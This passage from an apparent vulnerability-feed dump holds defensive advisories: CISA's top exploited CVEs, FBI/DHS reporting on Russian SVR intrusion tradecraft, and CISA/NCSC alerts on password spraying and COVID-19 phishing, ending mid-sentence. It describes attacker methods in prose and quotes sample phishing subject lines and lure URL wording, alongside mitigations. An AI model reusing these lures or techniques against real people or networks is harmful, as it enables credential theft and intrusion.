RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-03-14T18:32:15", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors\u2014also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium\u2014will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled \u201cRussian SVR Targets U.S. and Allied Networks,\u201d released on April 15, 2021.\n\nThe FBI and DHS are providing information on the SVR\u2019s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.\n\nClick here for a PDF version of this report.\n\n### Threat Overview\n\nSVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors\u2019 ability to move within victim environments undetected.\n\nBeginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.\n\n### Technical Details\n\n### SVR Cyber Operations Tactics, Techniques, and Procedures\n\n### Password Spraying\n\nIn one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a \u201clow and slow\u201d manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.\n\nThe organization unintentionally exempted the compromised administrator\u2019s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.\n\nThe actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple\u2019s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.\n\nWhile the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.\n\nDuring the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. \n\n#### _**Recommendations**_\n\nTo defend from this technique, the FBI and DHS recommend network operators to follow best practices for configuring access to cloud computing environments, including:\n\n * Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.\n * Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.\n * Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.\n * Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.\n * Regularly review the organization\u2019s password management program.\n * Ensure the organization\u2019s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.\n * Maintain a regular cadence of security awareness training for all company employees.\n\n### Leveraging Zero-Day Vulnerability\n\nIn a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.\n\nThe actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.\n\nFollowing initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.\n\n#### **_Recommendations_**\n\nTo defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:\n\n * Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.\n * Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.\n * Require use of multi-factor authentication to access internal systems.\n * Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization\u2019s security baseline and incorporate into enterprise monitoring tools.\n\n### WELLMESS Malware\n\nIn 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI\u2019s investigation revealed that following initial compromise of a network\u2014normally through an unpatched, publicly-known vulnerability\u2014the actors deployed WELLMESS. Once on the network, the actors targeted each organization\u2019s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion have been previously released and are referenced in the \u2018Resources\u2019 section of this document.\n\n### Tradecraft Similarities of SolarWinds-enabled Intrusions\n\nDuring the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR\u2019s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR\u2019s historic tradecraft.\n\nThe FBI\u2019s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.\n\n#### **_Recommendations_**\n\nAlthough defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:\n\n * Auditing log files to identify attempts to access privileged certificates and creation of fake identify providers.\n * Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.\n * Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\n * Using available public resources to identify credential abuse within cloud environments.\n * Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.\n\nWhile few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly \u201czero trust\u201d architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.\n\n### General Tradecraft Observations\n\nSVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.\n\nThe FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz\u2014an open source credential-dumping too\u2014and Cobalt Strike\u2014a commercially available exploitation tool.\n\n### Mitigations\n\nThe FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.\n\n### Resources\n\n * NSA, CISA, FBI [Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n * CISA: [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise ](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * FBI, CISA, ODNI, NSA Joint Statement: [Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency](<https://www.odni.gov/index.php/newsroom/press-releases/press-releases-2021/item/2176-joint-statement-by-the-federal-bureau-of-investigation-fbi-the-cybersecurity-and-infrastructure-security-agency-cisa-the-office-of-the-director-of-national-intelligence-odni-and-the-national-security-agency-nsa>)\n * CISA Alert [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity](<https://www.cisa.gov/sites/default/files/publications/CISA Insights - What Every Leader Needs to Know About the Ongoing APT Cyber Activity - FINAL_508.pdf>)\n * FBI, CISA [Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>)\n * CISA: [Malicious Activity Targeting COVID-19 Research, Vaccine Development ](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/malicious-activity-targeting-covid-19-research-vaccine-development>)\n * NCSC, CSE, NSA, CISA Advisory: [APT 29 targets COVID-19 vaccine development](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n### Revisions\n\nApril 26, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T12:00:00", "type": "ics", "title": "Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-26T12:00:00", "id": "AA21-116A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-116a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:35:54", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nCISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. It describes some of the methods these actors are using to target organizations and provides mitigation advice.\n\nThe joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA\u2019s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).\n\n### COVID-19-related targeting\n\nAPT actors are actively targeting organizations involved in both national and international COVID-19 responses. These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.\n\nAPT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.\n\nThe pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy, or acquire sensitive data on COVID-19-related research.\n\n### Targeting of pharmaceutical and research organizations\n\nCISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations. **See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability **so you are collecting the data that will be needed to analyze network intrusions. See the [NCSC introduction to logging security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information: **Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:36:09", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nThis alert provides information on exploitation by cybercriminal and advanced persistent threat (APT) groups of the current coronavirus disease 2019 (COVID-19) global pandemic. It includes a non-exhaustive list of indicators of compromise (IOCs) for detection as well as mitigation advice.\n\nBoth CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors. At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations.\n\nAPT groups and cybercriminals are targeting individuals, small and medium enterprises, and large organizations with COVID-19-related scams and phishing emails. This alert provides an overview of COVID-19-related malicious cyber activity and offers practical advice that individuals and organizations can follow to reduce the risk of being impacted. The IOCs provided within the accompanying .csv and .stix files of this alert are based on analysis from CISA, NCSC, and industry.\n\n**Note: **this is a fast-moving situation and this alert does not seek to catalogue all COVID-19-related malicious cyber activity. Individuals and organizations should remain alert to increased activity relating to COVID-19 and take proactive steps to protect themselves.\n\n### Technical Details\n\n## Summary of Attacks\n\nAPT groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and \u201chack-and-leak\u201d operations.\n\nCybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.\n\nBoth APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. Threats observed include:\n\n * Phishing, using the subject of coronavirus or COVID-19 as a lure,\n * Malware distribution, using coronavirus- or COVID-19- themed lures,\n * Registration of new domain names containing wording related to coronavirus or COVID-19, and\n * Attacks against newly\u2014and often rapidly\u2014deployed remote access and teleworking infrastructure.\n\nMalicious cyber actors rely on basic social engineering methods to entice a user to carry out a specific action. These actors are taking advantage of human traits such as curiosity and concern around the coronavirus pandemic in order to persuade potential victims to:\n\n * Click on a link or download an app that may lead to a phishing website, or the downloading of malware, including ransomware. \n * For example, a malicious Android app purports to provide a real-time coronavirus outbreak tracker but instead attempts to trick the user into providing administrative access to install \"CovidLock\" ransomware on their device.[[1]](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n * Open a file (such as an email attachment) that contains malware. \n * For example, email subject lines contain COVID-19-related phrases such as \u201cCoronavirus Update\u201d or \u201c2019-nCov: Coronavirus outbreak in your city (Emergency)\u201d\n\nTo create the impression of authenticity, malicious cyber actors may spoof sender information in an email to make it appear to come from a trustworthy source, such as the World Health Organization (WHO) or an individual with \u201cDr.\u201d in their title. In several examples, actors send phishing emails that contain links to a fake email login page. Other emails purport to be from an organization\u2019s human resources (HR) department and advise the employee to open the attachment.\n\nMalicious file attachments containing malware payloads may be named with coronavirus- or COVID-19-related themes, such as \u201cPresident discusses budget savings due to coronavirus with Cabinet.rtf.\u201d\n\n**Note: **a non-exhaustive list of IOCs related to this activity is provided within the accompanying .csv and .stix files of this alert.\n\n## Phishing\n\nCISA and NCSC have both observed a large volume of phishing campaigns that use the social engineering techniques described above.\n\nExamples of phishing email subject lines include:\n\n * 2020 Coronavirus Updates,\n * Coronavirus Updates,\n * 2019-nCov: New confirmed cases in your City, and\n * 2019-nCov: Coronavirus outbreak in your city (Emergency).\n\nThese emails contain a call to action, encouraging the victim to visit a website that malicious cyber actors use for stealing valuable data, such as usernames and passwords, credit card information, and other personal information.\n\n## SMS Phishing\n\nMost phishing attempts come by email but NCSC has observed some attempts to carry out phishing by other means, including text messages (SMS).\n\nHistorically, SMS phishing has often used financial incentives\u2014including government payments and rebates (such as a tax rebate)\u2014as part of the lure. Coronavirus-related phishing continues this financial theme, particularly in light of the economic impact of the epidemic and governments\u2019 employment and financial support packages. For example, a series of SMS messages uses a UK government-themed lure to harvest email, address, name, and banking information. These SMS messages\u2014purporting to be from \u201cCOVID\u201d and \u201cUKGOV\u201d (see figure 1)\u2014include a link directly to the phishing site (see figure 2).\n\n\n\n##### Figure 1: UK government-themed SMS phishing\n\n\n\n##### Figure 2: UK government-themed phishing page\n\nAs this example demonstrates, malicious messages can arrive by methods other than email. In addition to SMS, possible channels include WhatsApp and other messaging services. Malicious cyber actors are likely to continue using financial themes in their phishing campaigns. Specifically, it is likely that they will use new government aid packages responding to COVID-19 as themes in phishing campaigns.\n\n## Phishing for credential theft\n\nA number of actors have used COVID-19-related phishing to steal user credentials. These emails include previously mentioned COVID-19 social engineering techniques, sometimes complemented with urgent language to enhance the lure.\n\nIf the user clicks on the hyperlink, a spoofed login webpage appears that includes a password entry form. These spoofed login pages may relate to a wide array of online services including\u2014but not limited to\u2014email services provided by Google or Microsoft, or services accessed via government websites.\n\nTo further entice the recipient, the websites will often contain COVID-19-related wording within the URL (e.g., \u201ccorona-virus-business-update,\u201d \u201ccovid19-advisory,\u201d or \u201ccov19esupport\u201d). These spoofed pages are designed to look legitimate or accurately 